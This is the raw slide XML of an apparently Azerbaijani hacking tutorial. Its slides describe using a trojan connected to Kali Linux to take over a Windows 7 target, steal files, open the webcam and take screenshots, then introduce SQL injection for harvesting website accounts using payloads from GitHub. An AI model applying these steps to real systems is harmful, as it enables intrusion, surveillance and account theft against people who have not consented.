              <a:rPr lang="az-Latn-AZ" sz="4800" dirty="0" err="1"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4800" dirty="0"/>
              <a:t> hədəfdə açıldığı anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4800" dirty="0" err="1"/>
              <a:t>KaliLinuxa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4800" dirty="0"/>
              <a:t> bağlantı gedir.</a:t>
            </a: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8597"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598" name="Rectangle 54"/>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99" name="Freeform: Shape 56"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="10825122" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10825122"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 9969784 w 10825122"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 10105415 w 10825122"/>
              <a:gd name="connsiteY2" fmla="*/ 264816 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 10825122 w 10825122"/>
              <a:gd name="connsiteY3" fmla="*/ 3429000 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 10105415 w 10825122"/>
              <a:gd name="connsiteY4" fmla="*/ 6593184 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 9969784 w 10825122"/>
              <a:gd name="connsiteY5" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 108251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97153" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="586" t="1948" r="3712" b="1465"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="189893" y="116733"/>
            <a:ext cx="6335774" cy="36068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48600"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01" name="Düzbucaqlı 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1366879" y="780768"/>
            <a:ext cx="763579" cy="20428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602" name="Düzbucaqlı 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1812152" y="1076426"/>
            <a:ext cx="1147864" cy="20428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pic>
        <p:nvPicPr>
          <p:cNvPr id="2097154" name="Şəkil 8" descr="Şəkil ehtiva edir mətn, qara, ani görüntü  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="40310"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="189893" y="3993787"/>
            <a:ext cx="6335774" cy="22807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48603" name="Mətn Qutusu 71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6525667" y="542043"/>
            <a:ext cx="4213782" cy="1158240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>Web For Pantester</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>IP ni </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t>öyrənmək üçün terminalda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000080"/>
                </a:highlight>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000080"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000080"/>
                </a:highlight>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t>əmrini yazırıq</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048604" name="Mətn Qutusu 74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6525667" y="3993787"/>
            <a:ext cx="4624886" cy="1691640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t>Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t>Lokal şəbəkəyə bağlı İP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1"/>
              <a:t>ləri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t>görmək üçün</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000080"/>
                </a:highlight>
              </a:rPr>
              <a:t>netdiscover</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t>əmrini yazırıq</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91"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92" name="Rectangle 11"/>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79" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="167898" y="948052"/>
            <a:ext cx="11856204" cy="3171536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048693"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94" name="Mətn Qutusu 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167898" y="243193"/>
            <a:ext cx="11544204" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1"/>
              <a:t>KaliLinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0"/>
              <a:t> terminalda  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1"/>
              <a:t>sessions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0"/>
              <a:t> –l əmrini yazırıq və aktiv olan bağlantıları görürük</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048695" name="Mətn Qutusu 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4036589"/>
            <a:ext cx="12367455" cy="2021840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1"/>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0"/>
              <a:t> –i 1 əmrini yazaraq hədəfə bağlanırıq və</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" sz="3200" dirty="0"/>
              <a:t>Windows 7 ni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0"/>
              <a:t> yəni hədəfi ələ keçirmiş oluruq və istədiyimiz əmrləri yazaraq hədəfdən </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1"/>
              <a:t>şəkil,video</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1"/>
              <a:t>və.s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0"/>
              <a:t> başqa faylları ala bilərik</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0"/>
              <a:t>Yada kamerasını aça </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1"/>
              <a:t>və.s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0"/>
              <a:t> istəyimizə uyğun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1"/>
              <a:t>əməliyatlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0"/>
              <a:t> edə bilərik</a:t>
            </a:r>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96"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97" name="Rectangle 11"/>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98" name="Freeform: Shape 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="10825122" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10825122"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 9969784 w 10825122"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 10105415 w 10825122"/>
              <a:gd name="connsiteY2" fmla="*/ 264816 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 10825122 w 10825122"/>
              <a:gd name="connsiteY3" fmla="*/ 3429000 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 10105415 w 10825122"/>
              <a:gd name="connsiteY4" fmla="*/ 6593184 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 9969784 w 10825122"/>
              <a:gd name="connsiteY5" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 108251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97180" name="Şəkil 4" descr="Şəkil ehtiva edir mətn, ani görüntü, monitor, bir neçə  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="87549" y="1658908"/>
            <a:ext cx="10452326" cy="3540183"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048699"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700" name="Mətn Qutusu 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="87549" y="44624"/>
            <a:ext cx="9095361" cy="1539240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0"/>
              <a:t>Nümunə olaraq terminalda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1"/>
              <a:t>screenshot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0"/>
              <a:t> əmri ilə hədəfin ekran şəklini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1"/>
              <a:t>çekdim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0"/>
              <a:t> və həmən şəkili öz sistemimə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1"/>
              <a:t>KaliLinuxda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0"/>
              <a:t> açdım</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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48701" name="Başlıq 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="210377" y="92412"/>
            <a:ext cx="11518327" cy="5199435"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Təhlükəsizlik Açığı nədir?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="4000" i="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>﻿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> açığı ilə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqldəki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> məlumatları </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>çəkmək,silmək</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>editləmək</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> və s. əməliyyatlar həyata keçirtmək olar.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="4000" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> açıqlarının yaranmasının səbəbləri </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqlə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> daxil olan və ya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqldən</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> çıxan məlumatların yoxlanmadan süzgəcdən keçirilmədən əmrləri həyata keçirildiyi üçün baş verir</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="4000" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048875" name="Metin kutusu 1048874"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5273796" y="5030014"/>
            <a:ext cx="1391487" cy="1513840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr" sz="9600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>✅</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="96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48701"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="700"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1048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48705" name="Başlıq 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="68094" y="476654"/>
            <a:ext cx="12558408" cy="4472973"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="9600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL açığı ilə</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="9600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" sz="8900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Saytdan Hesab </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="8900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>toplama</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="9600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="6000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Programsız</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="6000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Programla</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ"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097181" name="Şəkil 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2111104" y="501135"/>
            <a:ext cx="7969791" cy="413985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48706" name="Mətn Qutusu 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5156536"/>
            <a:ext cx="12151149" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hər hansı bir program olmadan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> açığının isdismarı üçün payloadlar tapırıq</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bunun üçün </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>googledə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL PAYLOAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yazıb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> shifəsindəki kodları istifadə edə bilərik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182" name="Şəkil 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
